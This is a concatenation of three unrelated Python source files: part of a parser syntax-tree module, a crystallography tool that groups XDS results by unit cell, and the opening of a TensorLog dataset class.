return [p for p in self._get_param_nodes() if p.type == 'param']
@property
def name(self):
return self.children[1] # First token after `def`
def iter_yield_exprs(self):
"""
Returns a generator of `yield_expr`.
"""
def scan(children):
for element in children:
if element.type in ('classdef', 'funcdef', 'lambdef'):
continue
try:
nested_children = element.children
except AttributeError:
if element.value == 'yield':
if element.parent.type == 'yield_expr':
yield element.parent
else:
yield element
else:
yield from scan(nested_children)
return scan(self.children)
def iter_return_stmts(self):
"""
Returns a generator of `return_stmt`.
"""
def scan(children):
for element in children:
if element.type == 'return_stmt' \
or element.type == 'keyword' and element.value == 'return':
yield element
if element.type in _RETURN_STMT_CONTAINERS:
yield from scan(element.children)
return scan(self.children)
def iter_raise_stmts(self):
"""
Returns a generator of `raise_stmt`. Includes raise statements inside try-except blocks
"""
def scan(children):
for element in children:
if element.type == 'raise_stmt' \
or element.type == 'keyword' and element.value == 'raise':
yield element
if element.type in _RETURN_STMT_CONTAINERS:
yield from scan(element.children)
return scan(self.children)
def is_generator(self):
"""
:return bool: Checks if a function is a generator or not.
"""
return next(self.iter_yield_exprs(), None) is not None
@property
def annotation(self):
"""
Returns the test node after `->` or `None` if there is no annotation.
"""
try:
if self.children[3] == "->":
return self.children[4]
assert self.children[3] == ":"
return None
except IndexError:
return None
class Lambda(Function):
"""
Lambdas are basically trimmed functions, so give it the same interface.
Children::
0. <Keyword: lambda>
*. <Param x> for each argument x
-2. <Operator: :>
-1. Node() representing body
"""
type = 'lambdef'
__slots__ = ()
def __init__(self, children):
# We don't want to call the Function constructor, call its parent.
super(Function, self).__init__(children)
# Everything between `lambda` and the `:` operator is a parameter.
self.children[1:-2] = _create_params(self, self.children[1:-2])
@property
def name(self):
"""
Raises an AttributeError. Lambdas don't have a defined name.
"""
raise AttributeError("lambda is not named.")
def _get_param_nodes(self):
return self.children[1:-2]
@property
def annotation(self):
"""
Returns `None`, lambdas don't have annotations.
"""
return None
def __repr__(self):
return "<%s@%s>" % (self.__class__.__name__, self.start_pos)
class Flow(PythonBaseNode):
__slots__ = ()
class IfStmt(Flow):
type = 'if_stmt'
__slots__ = ()
def get_test_nodes(self):
"""
E.g. returns all the `test` nodes that are named as x, below:
if x:
pass
elif x:
pass
"""
for i, c in enumerate(self.children):
if c in ('elif', 'if'):
yield self.children[i + 1]
def get_corresponding_test_node(self, node):
"""
Searches for the branch in which the node is and returns the
corresponding test node (see function above). However if the node is in
the test node itself and not in the suite return None.
"""
start_pos = node.start_pos
for check_node in reversed(list(self.get_test_nodes())):
if check_node.start_pos < start_pos:
if start_pos < check_node.end_pos:
return None
# In this case the node is within the check_node itself,
# not in the suite
else:
return check_node
def is_node_after_else(self, node):
"""
Checks if a node is defined after `else`.
"""
for c in self.children:
if c == 'else':
if node.start_pos > c.start_pos:
return True
else:
return False
class WhileStmt(Flow):
type = 'while_stmt'
__slots__ = ()
class ForStmt(Flow):
type = 'for_stmt'
__slots__ = ()
def get_testlist(self):
"""
Returns the input node ``y`` from: ``for x in y:``.
"""
return self.children[3]
def get_defined_names(self, include_setitem=False):
return _defined_names(self.children[1], include_setitem)
class TryStmt(Flow):
type = 'try_stmt'
__slots__ = ()
def get_except_clause_tests(self):
"""
Returns the ``test`` nodes found in ``except_clause`` nodes.
Returns ``[None]`` for except clauses without an exception given.
"""
for node in self.children:
if node.type == 'except_clause':
yield node.children[1]
elif node == 'except':
yield None
class WithStmt(Flow):
type = 'with_stmt'
__slots__ = ()
def get_defined_names(self, include_setitem=False):
"""
Returns the a list of `Name` that the with statement defines. The
defined names are set after `as`.
"""
names = []
for with_item in self.children[1:-2:2]:
# Check with items for 'as' names.
if with_item.type == 'with_item':
names += _defined_names(with_item.children[2], include_setitem)
return names
def get_test_node_from_name(self, name):
node = search_ancestor(name, "with_item")
if node is None:
raise ValueError('The name is not actually part of a with statement.')
return node.children[0]
class Import(PythonBaseNode):
__slots__ = ()
def get_path_for_name(self, name):
"""
The path is the list of names that leads to the searched name.
:return list of Name:
"""
try:
# The name may be an alias. If it is, just map it back to the name.
name = self._aliases()[name]
except KeyError:
pass
for path in self.get_paths():
if name in path:
return path[:path.index(name) + 1]
raise ValueError('Name should be defined in the import itself')
def is_nested(self):
return False # By default, sub classes may overwrite this behavior
def is_star_import(self):
return self.children[-1] == '*'
class ImportFrom(Import):
type = 'import_from'
__slots__ = ()
def get_defined_names(self, include_setitem=False):
"""
Returns the a list of `Name` that the import defines. The
defined names are set after `import` or in case an alias - `as` - is
present that name is returned.
"""
return [alias or name for name, alias in self._as_name_tuples()]
def _aliases(self):
"""Mapping from alias to its corresponding name."""
return dict((alias, name) for name, alias in self._as_name_tuples()
if alias is not None)
def get_from_names(self):
for n in self.children[1:]:
if n not in ('.', '...'):
break
if n.type == 'dotted_name': # from x.y import
return n.children[::2]
elif n == 'import': # from . import
return []
else: # from x import
return [n]
@property
def level(self):
"""The level parameter of ``__import__``."""
level = 0
for n in self.children[1:]:
if n in ('.', '...'):
level += len(n.value)
else:
break
return level
def _as_name_tuples(self):
last = self.children[-1]
if last == ')':
last = self.children[-2]
elif last == '*':
return # No names defined directly.
if last.type == 'import_as_names':
as_names = last.children[::2]
else:
as_names = [last]
for as_name in as_names:
if as_name.type == 'name':
yield as_name, None
else:
yield as_name.children[::2] # yields x, y -> ``x as y``
def get_paths(self):
"""
The import paths defined in an import statement. Typically an array
like this: ``[<Name: datetime>, <Name: date>]``.
:return list of list of Name:
"""
dotted = self.get_from_names()
if self.children[-1] == '*':
return [dotted]
return [dotted + [name] for name, alias in self._as_name_tuples()]
class ImportName(Import):
"""For ``import_name`` nodes. Covers normal imports without ``from``."""
type = 'import_name'
__slots__ = ()
def get_defined_names(self, include_setitem=False):
"""
Returns the a list of `Name` that the import defines. The defined names
is always the first name after `import` or in case an alias - `as` - is
present that name is returned.
"""
return [alias or path[0] for path, alias in self._dotted_as_names()]
@property
def level(self):
"""The level parameter of ``__import__``."""
return 0 # Obviously 0 for imports without from.
def get_paths(self):
return [path for path, alias in self._dotted_as_names()]
def _dotted_as_names(self):
"""Generator of (list(path), alias) where alias may be None."""
dotted_as_names = self.children[1]
if dotted_as_names.type == 'dotted_as_names':
as_names = dotted_as_names.children[::2]
else:
as_names = [dotted_as_names]
for as_name in as_names:
if as_name.type == 'dotted_as_name':
alias = as_name.children[2]
as_name = as_name.children[0]
else:
alias = None
if as_name.type == 'name':
yield [as_name], alias
else:
# dotted_names
yield as_name.children[::2], alias
def is_nested(self):
"""
This checks for the special case of nested imports, without aliases and
from statement::
import foo.bar
"""
return bool([1 for path, alias in self._dotted_as_names()
if alias is None and len(path) > 1])
def _aliases(self):
"""
:return list of Name: Returns all the alias
"""
return dict((alias, path[-1]) for path, alias in self._dotted_as_names()
if alias is not None)
class KeywordStatement(PythonBaseNode):
"""
For the following statements: `assert`, `del`, `global`, `nonlocal`,
`raise`, `return`, `yield`.
`pass`, `continue` and `break` are not in there, because they are just
simple keywords and the parser reduces it to a keyword.
"""
__slots__ = ()
@property
def type(self):
"""
Keyword statements start with the keyword and end with `_stmt`. You can
crosscheck this with the Python grammar.
"""
return '%s_stmt' % self.keyword
@property
def keyword(self):
return self.children[0].value
def get_defined_names(self, include_setitem=False):
keyword = self.keyword
if keyword == 'del':
return _defined_names(self.children[1], include_setitem)
if keyword in ('global', 'nonlocal'):
return self.children[1::2]
return []
class AssertStmt(KeywordStatement):
__slots__ = ()
@property
def assertion(self):
return self.children[1]
class GlobalStmt(KeywordStatement):
__slots__ = ()
def get_global_names(self):
return self.children[1::2]
class ReturnStmt(KeywordStatement):
__slots__ = ()
class YieldExpr(PythonBaseNode):
type = 'yield_expr'
__slots__ = ()
def _defined_names(current, include_setitem):
"""
A helper function to find the defined names in statements, for loops and
list comprehensions.
"""
names = []
if current.type in ('testlist_star_expr', 'testlist_comp', 'exprlist', 'testlist'):
for child in current.children[::2]:
names += _defined_names(child, include_setitem)
elif current.type in ('atom', 'star_expr'):
names += _defined_names(current.children[1], include_setitem)
elif current.type in ('power', 'atom_expr'):
if current.children[-2] != '**': # Just if there's no operation
trailer = current.children[-1]
if trailer.children[0] == '.':
names.append(trailer.children[1])
elif trailer.children[0] == '[' and include_setitem:
for node in current.children[-2::-1]:
if node.type == 'trailer':
names.append(node.children[1])
break
if node.type == 'name':
names.append(node)
break
else:
names.append(current)
return names
class ExprStmt(PythonBaseNode, DocstringMixin):
type = 'expr_stmt'
__slots__ = ()
def get_defined_names(self, include_setitem=False):
"""
Returns a list of `Name` defined before the `=` sign.
"""
names = []
if self.children[1].type == 'annassign':
names = _defined_names(self.children[0], include_setitem)
return [
name
for i in range(0, len(self.children) - 2, 2)
if '=' in self.children[i + 1].value
for name in _defined_names(self.children[i], include_setitem)
] + names
def get_rhs(self):
"""Returns the right-hand-side of the equals."""
node = self.children[-1]
if node.type == 'annassign':
if len(node.children) == 4:
node = node.children[3]
else:
node = node.children[1]
return node
def yield_operators(self):
"""
Returns a generator of `+=`, `=`, etc. or None if there is no operation.
"""
first = self.children[1]
if first.type == 'annassign':
if len(first.children) <= 2:
return # No operator is available, it's just PEP 484.
first = first.children[2]
yield first
yield from self.children[3::2]
class NamedExpr(PythonBaseNode):
type = 'namedexpr_test'
def get_defined_names(self, include_setitem=False):
return _defined_names(self.children[0], include_setitem)
class Param(PythonBaseNode):
"""
It's a helper class that makes business logic with params much easier. The
Python grammar defines no ``param`` node. It defines it in a different way
that is not really suited to working with parameters.
"""
type = 'param'
def __init__(self, children, parent):
super().__init__(children)
self.parent = parent
for child in children:
child.parent = self
@property
def star_count(self):
"""
Is `0` in case of `foo`, `1` in case of `*foo` or `2` in case of
`**foo`.
"""
first = self.children[0]
if first in ('*', '**'):
return len(first.value)
return 0
@property
def default(self):
"""
The default is the test node that appears after the `=`. Is `None` in
case no default is present.
"""
has_comma = self.children[-1] == ','
try:
if self.children[-2 - int(has_comma)] == '=':
return self.children[-1 - int(has_comma)]
except IndexError:
return None
@property
def annotation(self):
"""
The default is the test node that appears after `:`. Is `None` in case
no annotation is present.
"""
tfpdef = self._tfpdef()
if tfpdef.type == 'tfpdef':
assert tfpdef.children[1] == ":"
assert len(tfpdef.children) == 3
annotation = tfpdef.children[2]
return annotation
else:
return None
def _tfpdef(self):
"""
tfpdef: see e.g. grammar36.txt.
"""
offset = int(self.children[0] in ('*', '**'))
return self.children[offset]
@property
def name(self):
"""
The `Name` leaf of the param.
"""
if self._tfpdef().type == 'tfpdef':
return self._tfpdef().children[0]
else:
return self._tfpdef()
def get_defined_names(self, include_setitem=False):
return [self.name]
@property
def position_index(self):
"""
Property for the positional index of a paramter.
"""
index = self.parent.children.index(self)
try:
keyword_only_index = self.parent.children.index('*')
if index > keyword_only_index:
# Skip the ` *, `
index -= 2
except ValueError:
pass
try:
keyword_only_index = self.parent.children.index('/')
if index > keyword_only_index:
# Skip the ` /, `
index -= 2
except ValueError:
pass
return index - 1
def get_parent_function(self):
"""
Returns the function/lambda of a parameter.
"""
return search_ancestor(self, 'funcdef', 'lambdef')
def get_code(self, include_prefix=True, include_comma=True):
"""
Like all the other get_code functions, but includes the param
`include_comma`.
:param include_comma bool: If enabled includes the comma in the string output.
"""
if include_comma:
return super().get_code(include_prefix)
children = self.children
if children[-1] == ',':
children = children[:-1]
return self._get_code_for_children(
children,
include_prefix=include_prefix
)
def __repr__(self):
default = '' if self.default is None else '=%s' % self.default.get_code()
return '<%s: %s>' % (type(self).__name__, str(self._tfpdef()) + default)
class SyncCompFor(PythonBaseNode):
type = 'sync_comp_for'
__slots__ = ()
def get_defined_names(self, include_setitem=False):
"""
Returns the a list of `Name` that the comprehension defines.
"""
# allow async for
return _defined_names(self.children[1], include_setitem)
# This is simply here so an older Jedi version can work with this new parso
# version. Can be deleted in the next release.
CompFor = SyncCompFor
class UsedNamesMapping(Mapping):
"""
This class exists for the sole purpose of creating an immutable dict.
"""
def __init__(self, dct):
self._dict = dct
def __getitem__(self, key):
return self._dict[key]
def __len__(self):
return len(self._dict)
def __iter__(self):
return iter(self._dict)
def __hash__(self):
return id(self)
def __eq__(self, other):
# Comparing these dicts does not make sense.
return self is other
|
|
"""
(c) RIKEN 2015. All rights reserved.
Author: Keitaro Yamashita
This software is released under the new BSD License; see LICENSE.
"""
import iotbx.phil
from cctbx import uctbx
from cctbx import sgtbx
from cctbx import crystal
from cctbx.crystal import reindex
from cctbx.uctbx.determine_unit_cell import NCDist
from cctbx.sgtbx import pointgroup_tools
from yamtbx.dataproc.xds.xparm import XPARM
from yamtbx.dataproc.xds.xds_ascii import XDS_ASCII
from yamtbx.dataproc import pointless
from yamtbx.dataproc.xds import correctlp
from yamtbx.dataproc.dials.command_line import run_dials_auto
from yamtbx import util
from yamtbx.util import xtal
import os
import sys
import networkx as nx
import numpy
master_params_str = """
topdir = None
.type = path
xdsdir = None
.type = path
.multiple = true
.help = Either topdir= or (multiple) xdsdir= should be specified.
tol_length = 0.1
.type = float
.help = relative_length_tolerance
tol_angle = 5
.type = float
.help = absolute_angle_tolerance in degree
do_pointless = False
.type = bool
.help = Run pointless for largest group data to determine symmetry
"""
class CellGraph:
def __init__(self, tol_length=None, tol_angle=None):
self.tol_length = tol_length if tol_length else 0.1
self.tol_angle = tol_angle if tol_angle else 5
self.G = nx.Graph()
self.p1cells = {} # key->p1cell
self.dirs = {} # key->xdsdir
self.symms = {} # key->symms
self.cbops = {} # (key1,key2) = cbop
# __init__()
def get_p1cell_and_symm(self, xdsdir):
dials_hkl = os.path.join(xdsdir, "DIALS.HKL")
xac_file = util.return_first_found_file(("XDS_ASCII.HKL", "XDS_ASCII.HKL.org",
"XDS_ASCII_fullres.HKL.org", "XDS_ASCII_fullres.HKL",
"XDS_ASCII.HKL_noscale.org", "XDS_ASCII.HKL_noscale"),
wd=xdsdir)
p1cell, xs = None, None
if xac_file:
correct_lp = util.return_first_found_file(("CORRECT.LP_noscale", "CORRECT.LP"), wd=xdsdir)
if not correct_lp:
print "CORRECT.LP not found in %s" % xdsdir
return None, None
p1cell = correctlp.get_P1_cell(correct_lp, force_obtuse_angle=True)
try:
xac = XDS_ASCII(xac_file, read_data=False)
except:
print "Invalid XDS_ASCII format:", xac_file
return None, None
xs = xac.symm
elif os.path.isfile(dials_hkl): # DIALS
xs = run_dials_auto.get_most_possible_symmetry(xdsdir)
if xs is None:
print "Cannot get crystal symmetry:", xdsdir
return None, None
p1cell = list(xs.niggli_cell().unit_cell().parameters())
# force obtuse angle
tmp = map(lambda x: (x[0]+3,abs(90.-x[1])), enumerate(p1cell[3:])) # Index and difference from 90 deg
tmp.sort(key=lambda x: x[1], reverse=True)
if p1cell[tmp[0][0]] < 90:
tmp = map(lambda x: (x[0]+3,90.-x[1]), enumerate(p1cell[3:])) # Index and 90-val.
tmp.sort(key=lambda x: x[1], reverse=True)
for i,v in tmp[:2]: p1cell[i] = 180.-p1cell[i]
p1cell = uctbx.unit_cell(p1cell)
return p1cell, xs
# get_p1cell_and_symm()
def add_proc_result(self, key, xdsdir):
if key in self.G: return #G.remove_node(key)
p1cell, symm = self.get_p1cell_and_symm(xdsdir)
if None in (p1cell, symm): return
self.p1cells[key] = p1cell
self.dirs[key] = xdsdir
self.symms[key] = symm
connected_nodes = []
for node in self.G.nodes():
other_cell = self.p1cells[node]
if other_cell.is_similar_to(p1cell, self.tol_length, self.tol_angle):
connected_nodes.append(node)
else:
cosets = reindex.reindexing_operators(crystal.symmetry(other_cell, 1),
crystal.symmetry(p1cell, 1),
self.tol_length, self.tol_angle)
if cosets.double_cosets is not None:
self.cbops[(node,key)] = cosets.combined_cb_ops()[0]
print p1cell, other_cell, self.cbops[(node,key)], other_cell.change_basis(self.cbops[(node,key)])
connected_nodes.append(node)
# Add nodes and edges
self.G.add_node(key)
for node in connected_nodes:
self.G.add_edge(node, key)
# add_proc_result()
def _transformed_cells(self, keys):
cells = [self.p1cells[keys[0]].parameters()]
for key in keys[1:]:
cell = self.p1cells[key]
if (keys[0], key) in self.cbops:
cell = cell.change_basis(self.cbops[(keys[0], key)])
elif (key, keys[0]) in self.cbops:
cell = cell.change_basis(self.cbops[(key, keys[0])].inverse()) # correct??
cells.append(cell.parameters())
return cells
# _transformed_cells()
def _average_p1_cell(self, keys):
cells = numpy.array(self._transformed_cells(keys))
return map(lambda i: cells[:,i].mean(), xrange(6))
# _average_p1_cell()
def group_xds_results(self, out, show_details=True):
print >>out, "Making groups from %d results\n" % len(self.p1cells) # Show total and failed!!
self.groups = map(lambda g: list(g), nx.connected_components(self.G))
self.groups.sort(key=lambda x:-len(x))
self.grouped_dirs = []
self.reference_symmetries = []
#details_str = "group file a b c al be ga\n"
#ofs_debug = open("cell_debug.dat", "w")
#ofs_debug.write("group xdsdir a b c al be ga\n")
for i, keys in enumerate(self.groups):
self.reference_symmetries.append([])
avg_cell = uctbx.unit_cell(self._average_p1_cell(keys))
print >>out, "[%2d]"%(i+1), len(keys), "members:"
print >>out, " Averaged P1 Cell=", " ".join(map(lambda x:"%.2f"%x, avg_cell.parameters()))
#from yamtbx.util.xtal import format_unit_cell
#for xd, uc in zip(map(lambda k:self.dirs[k], keys), self._transformed_cells(keys)):
# ofs_debug.write("%3d %s %s\n" % (i, xd, format_unit_cell(uc)))
#print >>out, " Members=", keys
if show_details:
# by explore_metric_symmetry
sg_explorer = pointgroup_tools.space_group_graph_from_cell_and_sg(avg_cell, sgtbx.space_group_info("P1").group(), max_delta=10)
tmp = []
for obj in sg_explorer.pg_graph.graph.node_objects.values():
pg = obj.allowed_xtal_syms[0][0].space_group().build_derived_reflection_intensity_group(True).info()
cbop = obj.allowed_xtal_syms[0][1]
trans_cell = avg_cell.change_basis(cbop)
if pg.group() == sgtbx.space_group_info("I2").group():
print >>out, "Warning!! I2 cell was given." # this should not happen..
# Transform to best cell
fbc = crystal.find_best_cell(crystal.symmetry(trans_cell, space_group_info=pg,
assert_is_compatible_unit_cell=False),
best_monoclinic_beta=False) # If True, C2 may result in I2..
cbop = fbc.cb_op() * cbop
trans_cell = trans_cell.change_basis(fbc.cb_op())
#print "debug:: op-to-best-cell=", fbc.cb_op()
# If beta<90 in monoclinic system, force it to have beta>90
if pg.group().crystal_system() == "Monoclinic" and trans_cell.parameters()[4] < 90:
op = sgtbx.change_of_basis_op("-h,-k,l")
cbop = op * cbop
trans_cell = trans_cell.change_basis(op)
tmp.append([0, pg, trans_cell, cbop, pg.type().number()])
# Calculate frequency
for pgnum in set(map(lambda x: x[-1], tmp)):
sel = filter(lambda x: tmp[x][-1]==pgnum, xrange(len(tmp)))
pgg = tmp[sel[0]][1].group()
if len(sel) == 1:
freq = len(filter(lambda x: self.symms[x].space_group().build_derived_reflection_intensity_group(True) == pgg, keys))
tmp[sel[0]][0] = freq
else:
trans_cells = map(lambda x: numpy.array(tmp[x][2].parameters()), sel)
for key in keys:
if self.symms[key].space_group().build_derived_reflection_intensity_group(True) != pgg: continue
cell = numpy.array(self.symms[key].unit_cell().parameters())
celldiffs = map(lambda tc: sum(abs(tc-cell)), trans_cells)
min_key = celldiffs.index(min(celldiffs))
tmp[sel[min_key]][0] += 1
print >>out, " Possible symmetries:"
print >>out, " freq symmetry a b c alpha beta gamma reindex"
for freq, pg, trans_cell, cbop, pgnum in sorted(tmp, key=lambda x:x[-1]):
print >> out, " %4d %-10s %s %s" % (freq, pg, " ".join(map(lambda x:"%6.2f"%x, trans_cell.parameters())), cbop)
self.reference_symmetries[i].append((pg, trans_cell, freq))
print >>out, ""
dirs = map(lambda x: self.dirs[x], keys)
self.grouped_dirs.append(dirs)
# group_xds_results()
def get_reference_symm(self, group_idx, rs_idx):
# XXX should be able to specify space group with screws
if group_idx >= len(self.reference_symmetries):
return None
if rs_idx >= len(self.reference_symmetries[group_idx]):
return None
pg, cell, freq = self.reference_symmetries[group_idx][rs_idx]
return crystal.symmetry(cell,
space_group_info=pg,
assert_is_compatible_unit_cell=False)
# get_reference_symm()
def get_selectable_symms(self, group_idx):
if group_idx >= len(self.reference_symmetries):
return []
return self.reference_symmetries[group_idx]
# get_selectable_symms()
def get_most_frequent_symmetry(self, group_idx):
# Should call after self.group_xds_results()
symms = filter(lambda x: x[2]>0, self.reference_symmetries[group_idx])
symms.sort(key=lambda x: x[2], reverse=True)
if len(symms) == 0: return None
if len(symms) > 1 and symms[0][0].group() == sgtbx.space_group_info("P1").group():
return crystal.symmetry(symms[1][1], space_group_info=symms[1][0],
assert_is_compatible_unit_cell=False)
else:
return crystal.symmetry(symms[0][1], space_group_info=symms[0][0],
assert_is_compatible_unit_cell=False)
# get_most_frequent_symmetry()
def get_symmetry_reference_matched(self, group_idx, ref_cs):
ref_pg = ref_cs.space_group().build_derived_reflection_intensity_group(True)
ref_cell = ref_cs.unit_cell()
symms = filter(lambda x: x[0].group()==ref_pg, self.reference_symmetries[group_idx])
if len(symms) == 0: return None
if len(symms) > 1:
# TODO if different too much?
celldiffs = map(lambda s: s[1].bases_mean_square_difference(ref_cell), symms)
min_idx = celldiffs.index(min(celldiffs))
return crystal.symmetry(symms[min_idx][1], space_group_info=symms[min_idx][0],
assert_is_compatible_unit_cell=False)
else:
return crystal.symmetry(symms[0][1], space_group_info=symms[0][0],
assert_is_compatible_unit_cell=False)
# get_symmetry_reference_matched()
def get_group_symmetry_reference_matched(self, ref_cs):
ref_v6 = xtal.v6cell(ref_cs.niggli_cell().unit_cell())
ncdists = []
for i, keys in enumerate(self.groups):
v6 = xtal.v6cell(uctbx.unit_cell(self._average_p1_cell(keys)).niggli_cell())
ncdists.append(NCDist(v6, ref_v6))
print "Group %d: NCDist to reference: %f" % (i+1, ncdists[-1])
return ncdists.index(min(ncdists))+1
# get_group_symmetry_reference_matched()
def is_all_included(self, keys):
all_nodes = set(self.G.nodes())
return all_nodes.issuperset(keys)
# is_all_included()
def get_subgraph(self, keys):
copied_obj = CellGraph(self.tol_length, self.tol_angle)
copied_obj.G = self.G.subgraph(keys)
copied_obj.p1cells = dict((k, self.p1cells[k]) for k in keys)
copied_obj.dirs = dict((k, self.dirs[k]) for k in keys)
copied_obj.symms = dict((k, self.symms[k]) for k in keys)
copied_obj.cbops = dict((k, self.cbops[k]) for k in self.cbops if k[0] in keys or k[1] in keys) # XXX may be slow
return copied_obj
# get_subgraph()
# class CellGraph
def run(params, out=sys.stdout):
cm = CellGraph(tol_length=params.tol_length, tol_angle=params.tol_angle)
if not params.xdsdir and params.topdir:
params.xdsdir = map(lambda x: x[0], filter(lambda x: any(map(lambda y: y.startswith("XDS_ASCII.HKL"), x[2])) or "DIALS.HKL" in x[2],
os.walk(params.topdir)))
for i, xdsdir in enumerate(params.xdsdir):
cm.add_proc_result(i, xdsdir)
cm.group_xds_results(out)
ret = cm.grouped_dirs
if len(ret) == 0:
return cm
print >>out
print >>out, "About the largest group:"
for idx, wd in enumerate(ret[0]):
xac_hkl = os.path.join(wd, "XDS_ASCII.HKL")
correct_lp = os.path.join(wd, "CORRECT.LP")
print >>out, "%.3d %s" % (idx, os.path.relpath(wd, params.topdir) if params.topdir is not None else wd),
if not os.path.isfile(xac_hkl):
print >>out, "Unsuccessful"
continue
sg = XDS_ASCII(xac_hkl, read_data=False).symm.space_group_info()
clp = correctlp.CorrectLp(correct_lp)
if "all" in clp.table:
cmpl = clp.table["all"]["cmpl"][-1]
else:
cmpl = float("nan")
ISa = clp.a_b_ISa[-1]
print >>out, "%10s ISa=%5.2f Cmpl=%5.1f " % (sg, ISa, cmpl)
if params.do_pointless:
worker = pointless.Pointless()
files = map(lambda x: os.path.join(x, "INTEGRATE.HKL"), ret[0])
#print files
files = filter(lambda x: os.path.isfile(x), files)
print >>out, "\nRunning pointless for the largest member."
result = worker.run_for_symm(xdsin=files,
logout="pointless.log",
tolerance=10, d_min=5)
if "symm" in result:
print >>out, " pointless suggested", result["symm"].space_group_info()
if 0:
import pylab
pos = nx.spring_layout(G)
#pos = nx.spectral_layout(G)
#pos = nx.circular_layout(G)
#nx.draw_networkx_nodes(G, pos, node_size = 100, nodelist=others, node_color = 'w')
nx.draw_networkx_nodes(G, pos, node_size = 100, node_color = 'w')
nx.draw_networkx_edges(G, pos, width = 1)
nx.draw_networkx_labels(G, pos, font_size = 12, font_family = 'sans-serif', font_color = 'r')
pylab.xticks([])
pylab.yticks([])
pylab.savefig("network.png")
pylab.show()
return cm
# run()
def run_from_args(argv):
cmdline = iotbx.phil.process_command_line(args=argv,
master_string=master_params_str)
params = cmdline.work.extract()
args = cmdline.remaining_args
for arg in args:
if os.path.isdir(arg) and params.topdir is None:
params.topdir = arg
if not params.xdsdir and params.topdir is None:
params.topdir = os.getcwd()
run(params)
# run_from_args()
if __name__ == "__main__":
import sys
run_from_args(sys.argv[1:])
|
|
# (C) William W. Cohen and Carnegie Mellon University, 2016
import sys
import re
import math
import os.path
import collections
import scipy.sparse as SS
import scipy.io as SIO
import numpy as NP
import numpy.random as NR
import logging
from tensorlog import config
from tensorlog import mutil
from tensorlog import matrixdb
from tensorlog import declare
from tensorlog import util
conf = config.Config()
conf.normalize_outputs = True; conf.help.normalize_outputs = "In .exam files, l1-normalize the weights of valid outputs"
#
# dealing with labeled training data
#
class Dataset(object):
def __init__(self,xDict,yDict):
# dict which maps mode declaration to X matrices for training
self.xDict = xDict
# likewise for Y matrices
self.yDict = yDict
def isSinglePredicate(self):
"""Returns true if all the examples are for a single predicate."""
return len(list(self.xDict.keys()))==1
def extractMode(self,mode):
"""Return a new Dataset that just contains this mode."""
assert mode in self.xDict, 'dataset does not contain mode %s' % str(mode)
return Dataset({mode:self.xDict[mode]}, {mode:self.yDict[mode]})
def modesToLearn(self):
"""Return list of modes associated with the data."""
return list(self.xDict.keys())
def hasMode(self,mode):
"""True if there are examples of the mode in the dataset."""
return (mode in self.yDict and mode in self.xDict)
def getX(self,mode):
"""Get a matrix of all inputs for the mode."""
return self.xDict[mode]
def getY(self,mode):
"""Get a matrix of all desired outputs for the mode."""
return self.yDict[mode]
def size(self):
return sum([m.nnz for m in list(self.xDict.values())]) + sum([m.nnz for m in list(self.yDict.values())])
def shuffle(self):
for mode in self.xDict:
shuffledRowNums = NP.arange(mutil.numRows(self.xDict[mode]))
NR.shuffle(shuffledRowNums)
self.xDict[mode] = mutil.shuffleRows(self.xDict[mode],shuffledRowNums)
self.yDict[mode] = mutil.shuffleRows(self.yDict[mode],shuffledRowNums)
def minibatchIterator(self,batchSize=100,shuffleFirst=True):
"""Iterate over triples (mode,X',Y') where X' and Y' are sets of
batchSize rows from the full data for mode, randomly selected
(without replacement) from the dataset."""
# randomize the order of the examples
if shuffleFirst: self.shuffle()
# then sample an ordering of the modes
modeList = self.modesToLearn()
modeSampleDict = {}
for modeIndex,mode in enumerate(modeList):
numBatches = int(math.ceil( mutil.numRows(self.getX(mode)) / float(batchSize) ))
modeSampleDict[mode] = NP.ones(numBatches,dtype='int')*modeIndex
modeSamples = NP.concatenate(list(modeSampleDict.values()))
NR.shuffle(modeSamples)
# finally produce the minibatches
currentOffset = [0] * len(modeList)
for modeIndex in modeSamples:
mode = modeList[modeIndex]
lo = currentOffset[modeIndex]
bX = mutil.selectRows(self.getX(mode),lo,lo+batchSize)
bY = mutil.selectRows(self.getY(mode),lo,lo+batchSize)
currentOffset[modeIndex] += batchSize
yield mode,bX,bY
def pprint(self):
return ['%s: X %s Y %s' % (str(mode),mutil.pprintSummary(self.xDict[mode]),mutil.pprintSummary(self.yDict[mode])) for mode in self.xDict]
#
# i/o and conversions
#
def serialize(self,dir):
"""Save the dataset on disk."""
if not os.path.exists(dir):
os.mkdir(dir)
dx = dict([(str(k_v[0]),k_v[1]) for k_v in list(self.xDict.items())])
dy = dict([(str(k_v[0]),k_v[1]) for k_v in list(self.yDict.items())])
SIO.savemat(os.path.join(dir,"xDict"),dx,do_compression=True)
SIO.savemat(os.path.join(dir,"yDict"),dy,do_compression=True)
@staticmethod
def deserialize(dir):
"""Recover a saved dataset."""
logging.info('deserializing dataset file '+ dir)
xDict = {}
yDict = {}
SIO.loadmat(os.path.join(dir,"xDict"),xDict)
SIO.loadmat(os.path.join(dir,"yDict"),yDict)
#serialization converts modes to strings so convert them
#back.... it also converts matrices to csr
for d in (xDict,yDict):
for stringKey,mat in list(d.items()):
del d[stringKey]
if not stringKey.startswith('__'):
d[declare.asMode(stringKey)] = SS.csr_matrix(mat)
dset = Dataset(xDict,yDict)
logging.info('deserialized dataset has %d modes and %d non-zeros' % (len(dset.modesToLearn()), dset.size()))
return dset
@staticmethod
def uncacheExamples(dsetFile,db,exampleFile,proppr=True):
"""Build a dataset file from an examples file, serialize it, and
return the de-serialized dataset. Or if that's not necessary,
just deserialize it.
"""
if not os.path.exists(dsetFile) or os.path.getmtime(exampleFile)>os.path.getmtime(dsetFile):
logging.info('serializing examples in %s to %s' % (exampleFile,dsetFile))
dset = Dataset.loadExamples(db,exampleFile,proppr=proppr)
dset.serialize(dsetFile)
os.utime(dsetFile,None) #update the modification time for the directory
return dset
else:
return Dataset.deserialize(dsetFile)
@staticmethod
def uncacheMatrix(dsetFile,db,functorToLearn,functorInDB):
"""Build a dataset file from a DB matrix as specified with loadMatrix
and serialize it. Or if that's not necessary, just
deserialize it.
"""
if not os.path.exists(dsetFile):
print(('preparing examples from',functorToLearn,'...'))
dset = Dataset.loadMatrix(db,functorToLearn,functorInDB)
print(('serializing dsetFile',dsetFile,'...'))
dset.serialize(dsetFile)
return dset
else:
print(('de-serializing dsetFile',dsetFile,'...'))
return Dataset.deserialize(dsetFile)
# TODO remove or make type-aware
@staticmethod
def loadMatrix(db,functorToLearn,functorInDB):
"""Convert a DB matrix containing pairs x,f(x) to training data for a
learner. For each row x with non-zero entries, copy that row
to Y, and and also append a one-hot representation of x to the
corresponding row of X.
"""
assert db.isTypeless(),'cannot run loadMatrix on database with defined types'
